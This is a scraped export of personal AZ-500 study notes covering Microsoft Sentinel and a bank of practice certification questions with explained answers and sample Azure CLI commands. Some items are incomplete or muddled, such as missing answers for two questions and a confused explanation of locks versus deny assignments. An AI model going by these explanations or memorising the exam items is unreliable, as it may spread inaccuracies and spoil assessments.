        • To use Microsoft Sentinel, you need either contributor or reader permissions on the resource group that the workspace belongs to.
        • Additional permissions may be needed to connect specific data sources.
        • Microsoft Sentinel is a paid service.

        Having those, to onboard Microsoft Sentinel, you first need to connect to your security sources.

        Microsoft Sentinel comes with a number of connectors for Microsoft solutions, and additionally there are built-in connectors to the broader security ecosystem for non-Microsoft solutions. You can also use Common Event Format (CEF), Syslog, or REST API to connect your data sources to Microsoft Sentinel.

        The following data connection methods are supported by Microsoft Sentinel:

        • Service-to-service integration: Some services, such as AWS and Microsoft services, are connected natively. These services leverage the Azure foundation for out-of-the-box integration; the following solutions can be connected in a few clicks:
        • Amazon Web Services - CloudTrail
        • Azure Activity
        • Microsoft Entra audit logs and sign-ins
        • Microsoft Entra ID Protection
        • Azure Advanced Threat Protection
        • Azure Information Protection
        • Microsoft Defender for Cloud
        • Cloud App Security
        • Domain name server
        • Microsoft 365
        • Microsoft Defender ATP
        • Microsoft web application firewall
        • Windows firewall
        • Windows security events

        External solutions

        • API: Some data sources are connected using APIs that are provided by the connected data source. Typically, most security technologies provide a set of APIs through which event logs can be retrieved. The APIs connect to Microsoft Sentinel, gather specific data types, and send them to Azure Log Analytics.
        • Agent: The Microsoft Sentinel agent, which is based on the Log Analytics agent, converts CEF formatted logs into a format that can be ingested by Log Analytics. Depending on the appliance type, the agent is installed either directly on the appliance, or on a dedicated Linux server. To connect your external appliance to Microsoft Sentinel, the agent must be deployed on a dedicated machine (VM or on-premises) to support the communication between the appliance and Microsoft Sentinel. You can deploy the agent automatically or manually. Automatic deployment is only available if your dedicated machine is a new VM you are creating in Azure. Alternatively, you can deploy the agent manually on an existing Azure VM, on a VM in another cloud, or on an on-premises machine.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#32-create-workbooks-to-monitor-sentinel-data","title":"3.2. Create workbooks to monitor Sentinel data","text":"

        After onboarding to Microsoft Sentinel, monitor your data using the Azure Monitor workbooks integration.

        After you connect your data sources to Microsoft Sentinel, you can monitor the data using the Microsoft Sentinel integration with Azure Monitor Workbooks, which provides versatility in creating custom workbooks. While Workbooks are displayed differently in Microsoft Sentinel, it may be helpful for you to determine how to create interactive reports with Azure Monitor Workbooks. Microsoft Sentinel allows you to create custom workbooks across your data and comes with built-in workbook templates to quickly gain insights across your data as soon as you connect a data source.

        Workbooks are intended for\u00a0Security operations center (SOC)\u00a0engineers and analysts of all tiers to visualize data. Workbooks are best used for high-level views of Microsoft Sentinel data and don't require coding knowledge.

        You can't integrate workbooks with external data.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#33-enable-rules-to-create-incidents","title":"3.3. Enable rules to create incidents","text":"

        To help you reduce noise and minimize the number of alerts you have to review and investigate, Microsoft Sentinel uses analytics to correlate alerts into incidents.

        Incidents are groups of related alerts that indicate an actionable possible threat you can investigate and resolve.

        You can use the built-in correlation rules as-is or as a starting point to build your own.

        Microsoft Sentinel also provides machine learning rules to map your network behavior and then look for anomalies across your resources.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#34-configure-playbooks","title":"3.4. Configure playbooks","text":"

        Automate your common tasks and simplify security orchestration with playbooks that integrate with Azure services and your existing tools.

        To build playbooks with Azure Logic Apps, you can choose from a growing gallery of built-in playbooks. These include 200 or more connectors for services such as Azure functions. The connectors allow you to apply any custom logic in code like:

        • ServiceNow
        • Jira
        • Zendesk
        • HTTP requests
        • Microsoft Teams
        • Slack
        • Microsoft Entra ID
        • Microsoft Defender for Endpoint
        • Microsoft Defender for Cloud Apps

        For example, if you use the ServiceNow ticketing system, use Azure Logic Apps to automate your workflows and open a ticket in ServiceNow each time a particular alert or incident is generated.

        Playbooks are intended for\u00a0Security operations center (SOC)\u00a0engineers and analysts of all tiers to\u00a0automate\u00a0and\u00a0simplify tasks,\u00a0including data ingestion,\u00a0enrichment,\u00a0investigation, and\u00a0remediation. Playbooks work best with single, repeatable tasks and don't require coding knowledge. Playbooks aren't suitable for ad-hoc or complex task chains or for documenting and sharing evidence.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#35-hunt-and-investigate-potential-breaches","title":"3.5. Hunt and investigate potential breaches","text":"

        Microsoft Sentinel deep investigation tools help you to understand the scope and find the root cause of a potential security threat.

        Interactive graph. - You can choose an entity on the interactive graph to ask interesting questions for a specific entity and drill down into that entity and its connections to get to the root cause of the threat.

        Built-in queries. - Use Microsoft Sentinel's powerful hunting search-and-query tools, based on the MITRE framework, which enable you to proactively hunt for security threats across your organization\u2019s data sources before an alert is triggered. While hunting, create bookmarks to return to interesting events later. Use a bookmark to share an event with others or group events with other correlating events to create a compelling incident for investigation.

        Microsoft Sentinel supports Jupyter notebooks in Azure Machine Learning workspaces, including full machine learning, visualization, and data analysis libraries:

        • Perform analytics that isn't built into Microsoft Sentinel, such as some Python machine learning features.
        • Create data visualizations that aren't built into Microsoft Sentinel, such as custom timelines and process trees.
        • Integrate data sources outside of Microsoft Sentinel, such as an on-premises data set.

        Notebooks are intended for threat hunters or Tier 2-3 analysts, incident investigators, data scientists, and security researchers. They have a steeper learning curve and require coding knowledge. They have limited automation support.

        Notebooks in Microsoft Sentinel provide:

        • Queries to both Microsoft Sentinel and external data
        • Features for data enrichment, investigation, visualization, hunting, machine learning, and big data analytics

        Notebooks are best for:

        • More complex chains of repeatable tasks
        • Ad-hoc procedural controls
        • Machine learning and custom analysis

        Notebooks support rich Python libraries for manipulating and visualizing data. They're useful for documenting and sharing analysis evidence.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-exams/","title":"My 100 selected questions to warm up for the AZ-500 certificate","text":"

        These questions form the hard core of my question bank. They originate from various sources, including Udemy, Microsoft's free practice assessments, and YouTube videos. Successfully completing these questions does not guarantee a pass on the AZ-500 exam, but it does provide a good indicator of where you stand.

        Sources for these notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500\".
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023).
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-1","title":"Question 1","text":"

        You have custom alert rules in Microsoft Sentinel. The rules exceed the query length limitations. You need to resolve the issue. Which function should you use for the rule? Select only one answer.

        • ADX functions
        • Azure functions with a timer trigger
        • stored procedures
        • user-defined functions
        See response

        You can use user-defined functions to overcome the query length limitation. Timer trigger runs in a scheduled manner (pull, not push). Using ADX functions to create Azure Data Explorer queries inside the Log Analytics query window is unsupported. Stored procedures are unsupported by Azure Data Explorer.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-2","title":"Question 2","text":"

        You have an Azure Kubernetes Service (AKS) cluster named AKS1. You are configuring network isolation for AKS1. You need to limit which IP addresses can access the Kubernetes control plane. What should you do? Select only one answer.

        • Configure API server authorized IP ranges.
        • Configure Azure Front Door.
        • Customize CoreDNS for AKS.
        • Implement Open Service Mesh AKS add-on.
        See response

        The \"Open Service Mesh AKS add-on\" is designed to enhance communication and control between services within an Azure Kubernetes Service (AKS) cluster, offering features like service discovery, load balancing, and observability. However, it is not directly related to the task of limiting IP addresses that can access the Kubernetes control plane. Configuring API server authorized IP ranges is the correct approach for controlling access to the control plane by specifying which IP addresses or IP ranges are allowed to interact with the Kubernetes API server. The Open Service Mesh AKS add-on addresses a different aspect of AKS management, focusing on service-to-service communication, making it less relevant for the specific task of network isolation and control of the Kubernetes control plane. Azure Front Door is a global service for routing and load balancing traffic. It is not designed for controlling access to the Kubernetes control plane. Front Door is used for directing and optimizing the delivery of web applications, and it doesn't offer the fine-grained control needed to limit access to the Kubernetes API server. CoreDNS is a DNS server used within Kubernetes clusters for service discovery. While CoreDNS can play a role in the internal DNS resolution within the cluster, it is not a tool for restricting access to the Kubernetes control plane. Customizing CoreDNS is generally related to DNS resolution configurations and would not address the task of limiting IP addresses that can access the control plane.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-3","title":"Question 3","text":"

        Your company has an Azure subscription and an Amazon Web Services (AWS) account. You plan to deploy Kubernetes to AWS. You need to ensure that you can use Azure Monitor Container insights to monitor container workload performance. What should you deploy first? Select only one answer.

        • AKS Engine
        • Azure Arc-enabled Kubernetes
        • Azure Container Instances
        • Azure Kubernetes Service (AKS)
        • Azure Stack HCI
        See response

        Azure Arc-enabled Kubernetes is the only configuration that includes Kubernetes and can be deployed to AWS.
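
        A hedged sketch of the first step: connecting the AWS-hosted cluster to Azure Arc so that Container insights can then be enabled on it. The cluster and resource group names are hypothetical, kubectl must already point at the AWS cluster, and the connectedk8s and k8s-extension CLI extensions are assumed:

        az extension add --name connectedk8s\naz extension add --name k8s-extension\n\n# Onboard the AWS-hosted Kubernetes cluster to Azure Arc\naz connectedk8s connect --name aws-cluster1 --resource-group RG1\n\n# Then enable Azure Monitor Container insights on the Arc-enabled cluster\naz k8s-extension create --name azuremonitor-containers --cluster-name aws-cluster1 --resource-group RG1 --cluster-type connectedClusters --extension-type Microsoft.AzureMonitor.Containers\n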

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-4","title":"Question 4","text":"

        You have an Azure subscription that contains a virtual machine named VM1. VM1 is configured with just-in-time (JIT) VM access. You need to request access to VM1. Which PowerShell cmdlet should you run? Select only one answer.

        • Add-AzNetworkSecurityRuleConfig
        • Get-AzJitNetworkAccessPolicy
        • Set-AzJitNetworkAccessPolicy
        • Start-AzJitNetworkAccessPolicy
        See response

        The Start-AzJitNetworkAccessPolicy PowerShell cmdlet is used to request access to a JIT-enabled virtual machine. Set-AzJitNetworkAccessPolicy is used to enable JIT on a virtual machine. Get-AzJitNetworkAccessPolicy and Add-AzNetworkSecurityRuleConfig are not used to request access. Start-AzJitNetworkAccessPolicy initiates the JIT access request. When you run this cmdlet, you're essentially requesting access to a VM for a specific period, during which your access is allowed through specific network security group (NSG) rules. These rules are temporarily modified to grant access only during the JIT access window you requested. After the specified time window expires, the NSG rules revert to their previous state, thereby revoking the temporary access.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-5","title":"Question 5","text":"

        You have an Azure subscription. You plan to use the az aks create command to deploy an Azure Kubernetes Service (AKS) cluster named AKS1 that has Azure AD integration. You need to ensure that local accounts cannot be used on AKS1. Which flag should you use with the command? Select only one answer.

        • disable-local-accounts
        • generate-ssh-keys
        • kubelet-config
        • windows-admin-username
        See response

        When deploying an AKS cluster, local accounts are enabled by default. Even when enabling RBAC or Azure AD integration, --admin access still exists essentially as a non-auditable backdoor option. To disable local accounts on an AKS cluster, you should use the --disable-local-accounts flag with the az aks create command. The remaining options do not remove local accounts.
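
        For illustration, a minimal sketch of the deployment command with the flag in place (the resource group name is hypothetical):

        # Deploy an Azure AD-integrated AKS cluster with local accounts disabled\naz aks create --resource-group RG1 --name AKS1 --enable-aad --enable-azure-rbac --disable-local-accounts --generate-ssh-keys\n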

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-6","title":"Question 6","text":"

        You need to enable encryption at rest by using customer-managed keys (CMKs). Which two services support CMKs? Each correct answer presents a complete solution. Select all answers that apply.

        • Azure Blob storage
        • Azure Disk Storage
        • Azure Files
        • Azure NetApp Files
        • Log Analytics workspace
        See response

        Azure Files and Azure Blob Storage

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-7","title":"Question 7","text":"

        You implement dynamic data masking for an Azure Synapse Analytics workspace. You need to provide only a user named User1 with the ability to see the data. What should you do? Select only one answer.

        • Create a Conditional Access policy for Azure SQL Database, and then grant access.
        • Grant the UNMASK permission to User1.
        • Use the ALTER TABLE statement to drop the masking function.
        • Use the ALTER TABLE statement to edit the masking function.
        See response

        Granting the UNMASK permission to User1 removes the mask for User1 only. Creating a Conditional Access policy for Azure SQL Database, and then granting access is not enough for User1 to see the data, only to sign in. Using the ALTER TABLE statement to edit the masking function affects all users. Using the ALTER TABLE statement to drop the masking function removes the mask altogether.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-8","title":"Question 8","text":"

        You need to provide public anonymous access to a file in an Azure Storage account. The solution must follow the principle of least privilege. Which two actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

        • For the container, set Public access level to Blob.
        • For the container, set Public access level to Container.
        • For the storage account, set Blob public access to Disabled.
        • For the storage account, set Blob public access to Enabled.
        See response

        Unless prevented by another setting, setting Public access level to Blob allows public access to the blob only. Setting Blob public access to Enabled is a prerequisite for setting the access level of a container or blob. Setting Blob public access to Disabled prevents any public access, and setting Public access level to Container also allows access to any current and future blobs in the container, which does not follow the principle of least privilege.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-9","title":"Question 9","text":"

        You have an application that will securely share files hosted in Azure Blob storage to external users. The external users will not use Azure AD to authenticate. You plan to share more than 1,000 files. You need to restrict access to only a single IP address for each file. What should you do? Select only one answer.

        • Configure a storage account firewall.
        • Generate a service SAS that includes the signedIP field.
        • Set the Allow public anonymous access to setting for the storage account.
        • Set the Secure transfer required setting for the storage account.
        See response

        Generating a service SAS that includes the signedIP field allows a SAS to be generated by using an account key, and each SAS can be configured with an allowed IP address. The storage account firewall does not allow more than 200 IP address rules. Setting the Allow public anonymous access setting for the storage account does not restrict access by IP address. Setting the Secure transfer required property for the storage account prevents HTTP access, but it does not limit where the access request originates from.
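
        A minimal sketch of generating such a SAS with the Azure CLI, where the account, key variable, container, blob name, expiry, and IP address are all hypothetical; the --ip parameter populates the signedIP (sip) field of the token:

        az storage blob generate-sas --account-name mystorage1 --account-key $ACCOUNT_KEY --container-name files --name report0001.pdf --permissions r --expiry 2025-01-01T00:00Z --ip 203.0.113.45 --https-only --full-uri\n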

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-10","title":"Question 10","text":"

        You have an Azure virtual machine named VM1 that runs Windows Server 2022. A programmer is writing code to run on VM1. The code will use the system-assigned managed identity assigned to VM1 to access Azure resources. Which endpoint should the programmer use to request the authentication token required to access the Azure resources?

        • Azure AD v1.0.
        • Azure AD v2.0.
        • Azure Resource Manager.
        • Azure Instance Metadata Service.
        See response

        Azure Instance Metadata Service is a REST endpoint accessible to all IaaS virtual machines created via Azure Resource Manager (ARM). The endpoint is available at a well-known non-routable IP address (169.254.169.254) that can be accessed only from the virtual machines. The endpoint is used to request the authentication token required to gain access to the Azure resources. Azure AD v1.0 and Azure AD v2.0 endpoints are used to authenticate work and school accounts, not managed identities. The ARM endpoint is where the authentication token is sent by the code once it is obtained from the Azure Instance Metadata Service.
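
        As a concrete illustration, code on VM1 can request a token for Azure Resource Manager from the well-known IMDS address; this curl call follows the documented request pattern:

        # Request a managed identity token from the Azure Instance Metadata Service\ncurl -s -H \"Metadata: true\" \"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/\"\n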

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-11","title":"Question 11","text":"

        You are managing permission scopes for an Azure AD app registration. What are three OpenID Connect scopes that you can use? Each correct answer presents a complete solution.

        • email
        • openID
        • phone
        • offline_access
        See response

        The openID scope appears on the work account consent page as the Sign you in permission. The email scope gives the app access to a user's primary email address in the form of the email claim. The offline_access scope gives your app access to resources on behalf of a user for an extended time. On the consent page, this scope appears as the Maintain access to data you have given it access to permission.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-12","title":"Question 12","text":"

        You have a resource group named RG1 that contains an Azure virtual machine named VM1. A user named User1 is assigned the Contributor role for RG1. You need to prevent User1 from modifying the properties of VM1. What should you do?

        • Add a deny assignment for Microsoft.Compute/virtualMachines/* in the VM1 scope.
        • Apply a read-only lock to the RG1 scope.
        See response

        A read-only lock on a resource group that contains a virtual machine prevents all users from starting or restarting the virtual machine. The RBAC assignment is set at the resource group level and inherited by the resource. The assignment needs to be edited at the original scope (level). You cannot directly create your own deny assignments. Assigning User1 the Virtual Machine User Login role in the RG1 scope will still allow User1 to have access as a contributor to restart VM1. While you can create custom roles with specific permissions and assign those roles to users, Azure RBAC does not provide a direct mechanism for creating \"deny\" assignments, which would explicitly prevent users from performing specific actions. In other words, you can't explicitly deny a user or group certain permissions at the resource level using RBAC. To achieve fine-grained control over resource access, Azure generally focuses on granting permissions via role assignments and ensuring that users have only the necessary privileges for their tasks. If you want to restrict access, you typically grant a less permissive role or apply resource locks (such as a read-only lock, which prevents modifications) rather than creating deny assignments, which are not a standard part of Azure RBAC.
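
        A minimal sketch of applying the lock at the RG1 scope (the lock name is hypothetical):

        # A ReadOnly lock prevents modifications to resources in RG1, including VM1\naz lock create --name NoModifications --lock-type ReadOnly --resource-group RG1\n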

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-13","title":"Question 13","text":"

        You have an Azure subscription that contains an Azure AD tenant and an Azure web app named App1. A user named User1 needs permission to manage App1. The solution must follow the principle of least privilege. Which role should you assign to User1?

        • Cloud Application Administrator
        • Application Administrator
        • Cloud App Security Administrator
        • Application Developer
        See response

        Correct: Cloud Application Administrator - Since App1 is an app in Azure, this role provides administrative permissions to App1 and follows the principle of least privilege. Incorrect: Application Administrator - This role provides administrative permissions to App1 but also provides additional permissions to the app proxy for on-premises applications. Incorrect: Cloud App Security Administrator - This role is specific to the Microsoft Defender for Cloud Apps solution. Incorrect: Application Developer - This role allows the user to create registrations but not manage applications.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-14","title":"Question 14","text":"

        You have an Azure subscription that contains a virtual machine named VM1 and a storage account named storage1. You need to ensure that VM1 can access storage1 over the Azure backbone network. What should you implement?

        • Service endpoints
        • Private endpoints
        • A subnet
        • A VPN gateway
        See response

        Service endpoints route the traffic over the Azure backbone, allowing access to the entire service, for example, all Microsoft SQL servers or the storage accounts of all customers. Private endpoints provide access to a specific instance. A subnet does not by itself isolate or route traffic over the Azure backbone. A VPN gateway does not provide traffic isolation for all resources.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-15","title":"Question 15","text":"

        You have an Azure subscription that contains a virtual network named VNet1. VNet1 contains the following subnets:

        • Subnet1: Has a connected virtual machine
        • Subnet2: Has a Microsoft.Storage service endpoint
        • Subnet3: Has subnet delegation to the Microsoft.Web/serverFarms service
        • Subnet4: Has no additional configurations

        You need to deploy an Azure SQL managed instance named managed1 to VNet1. To which subnets can you connect managed1?

        • Subnet2 and Subnet4 only
        • Subnet2, Subnet3, and Subnet4 only
        • Subnet1, Subnet2, Subnet3, and Subnet4
        See response

        Azure SQL managed instances require a dedicated subnet without other resources or virtual machines connected to it. This is because managed instances have specific networking and isolation requirements, and sharing a subnet with other resources, like the virtual machine in Subnet1, could lead to conflicts in network configurations. Therefore, to deploy \"managed1,\" you should select a subnet that doesn't have any other resources connected to it, such as Subnet2, Subnet3, or a new dedicated subnet within VNet1. You can deploy an SQL managed instance to a dedicated virtual network subnet that does not have any resources connected. The subnet can have a service endpoint or can be delegated to a different service. For this scenario, you can deploy managed1 to Subnet2, Subnet3, and Subnet4 only. You cannot deploy managed1 to Subnet1 because Subnet1 has a connected virtual machine.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-16","title":"Question 16","text":"

        You host a web app on an Azure virtual machine. Users access the app through a public load balancer. You need to offload SSL traffic to the web app at the edge. What should you do?

        • Configure Traffic Manager.
        • Configure Azure Application Gateway.
        • Configure Azure Front Door and switch access to the app via an internal load balancer.
        • Configure Azure Firewall.
        See response

        Front Door allows for SSL offloading at the edge and can route traffic to an internal load balancer. Traffic Manager does not perform SSL offloading. Neither Azure Firewall nor an Application Gateway can be deployed at the edge. Azure Application Gateway: While Azure Application Gateway is a Layer 7 load balancer that can provide SSL termination and load balancing for web applications, it is not positioned at the network edge like Azure Front Door. Application Gateway is typically used for routing traffic within a virtual network to backend services. It can offload SSL traffic, but it is geared toward managing traffic within the Azure infrastructure and does not provide the same level of global load balancing and edge routing capabilities as Azure Front Door.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-17","title":"Question 17","text":"

        You have an Azure subscription that contains a virtual network named VNet1. You plan to deploy an Azure App Service web app named Web1. You need to be able to deploy Web1 to the subnet of VNet1. The solution must minimize costs. Which pricing plan should you use for Web1?

        • Basic
        • Shared
        • Isolated
        • Premium
        See response

        Only the Isolated pricing plan (tier) can be deployed to a virtual network subnet. With other pricing plans, inbound traffic is always routed to the public IP address of the web app, while web app outbound traffic can reach the endpoints on a virtual network.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-18","title":"Question 18","text":"

        You have a data connector for Microsoft Sentinel. You need to configure the connector to collect logs from Conditional Access in Azure AD. Which log should you connect to Microsoft Sentinel?

        • Sign-in logs
        • Audit logs
        • Activity logs
        • Provisioning logs
        See response

        Sign-in logs include information about sign-ins and how resources are used by your users. Audit logs include information about changes applied to your tenant, such as user and group management or updates applied to your tenant's resources. Activity logs include subscription-level events, not tenant-level activity. Provisioning logs include activities performed by the provisioning service, such as the creation of a group in ServiceNow or a user imported from Workday.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-19","title":"Question 19","text":"

        You have an Azure Storage account. You plan to prevent the use of shared keys by using Azure Policy. Which two access methods will continue to work? Each correct answer presents a complete solution. Select all answers that apply.

        • SAS account SAS
        • service SAS
        • Storage Blob Data Reader role
        • user delegation
        See response

        user delegation and Storage Blob Data Reader role.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-20","title":"Question 20","text":"

        You have an Azure SQL Database server. You enable Azure AD authentication for Azure SQL. You need to prevent other authentication methods from being used. Which command should you run? Select only one answer.

        • az sql mi ad-admin create
        • az sql mi ad-only-auth enable
        • az sql server ad-admin create
        • az sql server ad-only-auth enable
        See response

        az sql server ad-only-auth enable enables authentication only through Azure AD. az sql server ad-admin create and az sql mi ad-admin create do not stop other authentication methods. az sql mi ad-only-auth enable enables Azure AD-only authentication for Azure SQL Managed Instance, not for an Azure SQL Database server.
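
        A short sketch of the correct command, with hypothetical resource group and server names:

        # Enforce Azure AD-only authentication on an Azure SQL Database logical server\naz sql server ad-only-auth enable --resource-group RG1 --name sqlserver1\n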

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-21","title":"Question 21","text":"

        You have an application that securely shares files hosted in Azure Blob storage to external users by using an account SAS. One of the SAS tokens is compromised. How should you stop the compromised SAS token from being used? Select only one answer.

        • Regenerate the storage account access keys.
        • Set the Allow public anonymous access to setting for the storage account.
        • Set the Secure transfer required property for the storage account.
        • Switch to managed identities.
        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-22","title":"Question 22","text":"

        You have an Azure AD tenant. Users have both Windows and non-Windows devices. All users have smart phones. You plan to implement Azure AD Multi-Factor Authentication (MFA). You need to ensure that Azure MFA is used to authenticate users to Azure resources. The solution must be implemented without any additional cost. Which three Azure MFA method should you implement? Each correct answer presents a complete solution. Select all answers that apply.

        • FIDO2 security keys
        • OATH software tokens
        • SMS verification
        • the Microsoft Authenticator app
        • voice call verification
        • Windows Hello for Business
        See response

        SMS verification, the Microsoft Authenticator app, and voice call verification.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-23","title":"Question 23","text":"

        You are managing permission scopes for an Azure AD app registration. What are three OpenID Connect scopes that you can use? Each correct answer presents a complete solution. Select all answers that apply.

        • address
        • email
        • offline_access
        • openID
        • phone
        See response

        email, openID, offline_access.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-24","title":"Question 24","text":"

        You have an Azure subscription that contains a user named Admin1. You need to ensure that Admin1 can access the Regulatory compliance dashboard in Microsoft Defender for Cloud. The solution must follow the principle of least privilege. Which two roles should you assign to Admin1? Each correct answer presents part of the solution. Select all answers that apply.

        • Global Reader
        • Resource Policy Contributor
        • Security Admin
        • Security Reader
        See response

        To use the Regulatory compliance dashboard in Defender for Cloud, you must have sufficient permissions. At a minimum, you must be assigned the Resource Policy Contributor and Security Admin roles.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-25","title":"Question 25","text":"

        Your company has a multi-cloud online environment. You plan to use Microsoft Defender for Cloud to protect all supported online environments. Which three environments support Defender for Cloud? Each correct answer presents a complete solution. Select all answers that apply.

        • Alibaba Cloud
        • Amazon Web Services (AWS)
        • Azure DevOps
        • GitHub
        • Oracle Cloud
        See response

        Defender for Cloud protects workloads in Azure, AWS, GitHub, and Azure DevOps. Oracle Cloud and Alibaba Cloud are unsupported by Defender for Cloud.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-26","title":"Question 26","text":"

        You have Azure SQL databases that contain credit card information. You need to identify and label columns that contain credit card numbers. Which Microsoft Defender for Cloud feature should you use? Select only one answer.

        • hash reputation analysis
        • inventory filters
        • SQL information protection
        • SQL Servers on machines
        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-27","title":"Question 27","text":"

        You configure Microsoft Sentinel to connect to different data sources. You are unable to configure a connector that uses an Azure Functions API connection. Which permissions should you change? Select only one answer.

        • read and write permissions for Azure Functions
        • read and write permissions for the workspaces used by Microsoft Sentinel
        • read permissions for Azure Functions
        • read permissions for the workspaces used by Microsoft Sentinel
        See response

        You need read and write permissions for Azure Functions to configure a connector that uses an Azure Functions API connection. You were able to add other connectors, which proves that you have access to the workspace. Read permissions for the workspaces used by Microsoft Sentinel allow you to read data in Microsoft Sentinel. Read permissions for Azure Functions allow you to run functions, not create them.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-28","title":"Question 28","text":"

        You are configuring retention for Azure activity logs in Azure Monitor logs. The retention period for the Azure Monitor logs is set to 30 days. You need to meet the following compliance requirements:

        • Store the Azure activity logs for 90 days.
        • Encrypt the logs by using your own encryption keys.
        • Use the most cost-efficient storage solution for the logs.

        What should you do? Select only one answer.

        • Configure a workspace retention policy.
        • Configure diagnostic settings and send the logs to Azure Event Hubs Standard.
        • Configure diagnostic settings and send the logs to Azure Storage.
        • Leave the default settings as they are.
        See response

        Configuring diagnostic settings and sending the logs to Azure Storage meets both the retention time and encryption requirements. Activity log data type is kept for 90 days by default, but the logs are stored by using Microsoft-managed keys. Configuring a workspace retention policy is not the most cost-efficient solution for this. Event Hubs is a real-time event stream engine and is not designed to be used instead of a database or as a permanent store for indefinitely held event streams.
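
        A hedged sketch of the diagnostic settings step; the setting name, location, and storage account resource ID are hypothetical, and az monitor diagnostic-settings subscription create handles the subscription-level activity log:

        # Export subscription activity logs to a storage account for long-term retention\naz monitor diagnostic-settings subscription create --name ExportActivityLog --location eastus --storage-account /subscriptions/<SUBSCRIPTION ID>/resourceGroups/RG1/providers/Microsoft.Storage/storageAccounts/logstore1 --logs '[{\"category\": \"Administrative\", \"enabled\": true}]'\n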

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-29","title":"Question 29","text":"

        You need to implement a key management solution that supports importing keys generated in an on-premises environment. The solution must ensure that the keys stay within a single Azure region. What should you do? Select only one answer.

        • Apply the Keys should be the specified cryptographic type RSA or EC Azure policy.
        • Disable the Allow trusted services option.
        • Implement Azure Key Vault Firewall.
        • Implement Azure Key Vault Managed HSM.
        See response

        Key Vault Managed HSM supports importing keys generated in an on-premises HSM. Also, Managed HSM does not store or process customer data outside the Azure region in which the customer deploys the HSM instance. Implementing Key Vault Firewall restricts network access but does not address importing on-premises-generated keys. Enforcing HSM-backed keys does not enable them to be imported. Disabling the Allow trusted services option does not have a direct impact on key importing.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-30","title":"Question 30","text":"

        You have an Azure subscription that contains the following resources:

        • A virtual machine named VM1 that has a network interface named NIC1
        • A virtual network named VNet1 that has a subnet named Subnet1
        • A public IP address named PubIP1
        • A load balancer named LB1

        You create a network security group (NSG) named NSG1. To which two resources can you associate NSG1? Each correct answer presents a complete solution. Select all answers that apply.

        • LB1
        • NIC1
        • PubIP1
        • Subnet1
        • VM1
        • VNet1
        See response

        You can associate an NSG with a virtual network subnet and a network interface only. You can associate zero or one NSG with each virtual network subnet and network interface on a virtual machine. The same NSG can be associated with as many subnets and network interfaces as you choose.
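
        For illustration, both valid associations with the Azure CLI (resource names from the question; the resource group name is hypothetical):

        # Associate NSG1 with a subnet\naz network vnet subnet update --resource-group RG1 --vnet-name VNet1 --name Subnet1 --network-security-group NSG1\n\n# Associate NSG1 with a network interface\naz network nic update --resource-group RG1 --name NIC1 --network-security-group NSG1\n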

